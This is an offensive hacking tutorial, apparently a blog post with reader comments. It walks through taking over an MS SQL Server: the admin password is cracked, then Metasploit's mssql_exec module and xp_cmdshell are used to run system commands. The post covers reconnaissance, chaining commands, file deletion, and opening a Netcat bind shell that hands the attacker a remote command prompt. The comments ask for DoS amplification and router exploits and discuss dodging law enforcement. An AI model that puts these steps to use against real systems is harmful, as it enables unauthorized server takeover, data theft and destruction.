How to Hack Databases: Running CMD Commands from an Online MS SQL Server

Running CMD Commands from an Online MS SQL Server

Welcome back, my hacker novitiates!

There are many ways to hack databases, and most of these techniques require SQL injection (SQLi), which is a way of sending SQL commands back to the database from a web form or other input. In this tutorial, we will use SQL injection to get access to the underlying server. So instead of getting access to the database and its data, we will use the database as an intermediary to gain access to the underlying server.

Nearly all commercial databases—MS SQL Server, Oracle, MySQL, DB2, etc.—have built-in system stored procedures (SP). This is code provided by the developer to help the system administrator get common tasks done.

Often, the system admin of a database will need access to the underlying server, so Microsoft provides an SP called xp_cmdshell on their SQL Server. When the system admin executes this SP, they get a command prompt on the underlying server that is hosting the database.

This SP was once enabled by default on all Microsoft SQL Server installations, but because it was exploited by hackers so often, Microsoft had disabled it by default—but we can still access it and wreak havoc!

Of course, to access this SP remotely, we will need the login credentials of the system admin. By default, Microsoft packages their SQL Server with a system administrator account named "sa" and few system admins change it. You can use a tool such SQLdict or Metasploit's own auxiliary module, sql_login, to gain the sa password and use it in this hack.

If we can execute CMD commands on the victim system, we cannot only run reconnaissance on it, but we can also own it with enough knowledge of the system and knowledge of Windows commands.

Step 1: Open a Terminal

To start, as usual, fire up Kali and open a terminal.

Step 2: Open Metasploit

Let's start the Metasploit console by typing:

kali > msfconsole

This should open a console that looks similar to this.

Step 3: Load the Auxiliary Module

Now, we need to load the msql_exec auxiliary module.

msf > use auxiliary/admin/mssql/mssql_exec

Now that we have loaded the module, let's take a look at the info page for it. Type:

msf > info

As you can see below, we have several key variables we have to set including CMD, RHOST, and PASSWORD.

In this case, I set the RHOST to the IP of the database server, the PASSWORD to the "sa" account password that I cracked earlier (nullbyte), and command I want to run on the command shell on the server, in this case, 'dir' to get a directory listing. Make certain that the command is between single quotation marks.

When these variables have been set, simply type "run."

msf > run

This module will access the xp_cmdshell stored procedure, even though it is disabled, and return the results of the command.

As you can see, this command has been sent to the xp_cmdshell and executed the dir on the underlying server. The output is a directory listing from the C:\WINDOWS\system32 directory.

Step 4: Use the SP for Reconnaissance

To do a bit of reconnaissance on this server, we could send a "netstat" to the server to see all the connections to the system.

msf > set CMD 'netstat'

msf > run

Step 5: Send Multiple Commands

Sending single commands is all well and good, but there is not a lot of significant actions we can do with a single command with the exception of maybe a file deletion (del). We can send multiple commands by simply putting "&" in-between the commands, such as:

msf > set CMD 'cd \ & dir'

Now, when we run this module, it should change directories to the root directory on the Windows machine (C:) and then do a directory listing.

As you can imagine, we could travel throughout the directory structure in this way to find confidential or critical information and read or delete it.

Step 6: Run a Hidden Exe. File

You might have noticed that the system admin on the server has a Netcat executable in the root directory. They probably left it there for remote administration or other tasks. Now that we know it is there, we can run it from this module.

msf > set CMD 'cd \ & nc -L -p6996 -e cmd.exe'

This will change directory to the root directory where the Netcat resides and then open a Netcat listener (-L) on port 6996 (-p6996) and push a command shell through the listener. Let's try it.

It looks like it executed successfully. Now, let's try to connect to the listener with Netcat on our Kali system.

msf > ns 192.168.181.105 6996

Success! We now have command prompt on the remote system and we own it!

It's important to note that a knowledge of command line commands is key to being successful in this type of hack. Most of our tutorials here have focused on Linux commands, but Windows can be run successfully from the command line as well, especially with PowerShell. To do so, you need to know these commands in Windows as well as Linux. Even the registry can be altered from the command line!

I'll do a short tutorial in the near future on running Windows from the command line that should be helpful in this type of hack. So keep coming back, my hacker novitiates, as we explore the tools and techniques of the world's most valuable skill set—hacking!

12 Comments

Great tutorial! It's so interesting how methods like this are so easy to use, and so often not patched. It really brings perspective to the whole cyber security community.

Great tutorial. Could you please make one on amplified dos attacks with ntp servers

Hi master OTW
Thanks for your great articles! I really like them OwO
I'm a newbie female hacker :D

Can you write an article about the misfortune cookie(CVE-2014-9222) and a way to exploiting it? (Is this even possible?!)

I wanna crack a router password with this cookie, and also searched the entire web but couldn't find anything useful :(

i have a question: how do you know mssqlexec ?

What I like about these auxiliary modules is that they aren't actually exploiting anything, they're just acting as a real nice wrapper for something that otherwise is a bit sketchy.

Does this (and all other sql hacking) need to be done through vpn and related or is it relatively secure? (noob here)

No hacking is relatively secure in the sense that doesn't leave trails or logs somewhere (few exceptions made, for example heartbleed before it was made public...).

If you're interest in sql related hacking, there was a post eariler that deals with it. I gave some hints there on how to proceed if you want to know more.

Some VPNs (ex: Cyberghost) not only anonymize browser traffic but also all outgoing applications. Cyberghost claims not to keep any logs which makes it very appealing for hackers to use.

I didn't think cyberghost worked on linux?

when FBI knocks,cyberghost going to hand over logs lol

Hack avakin life

Share Your Thoughts

  • Hot
  • Latest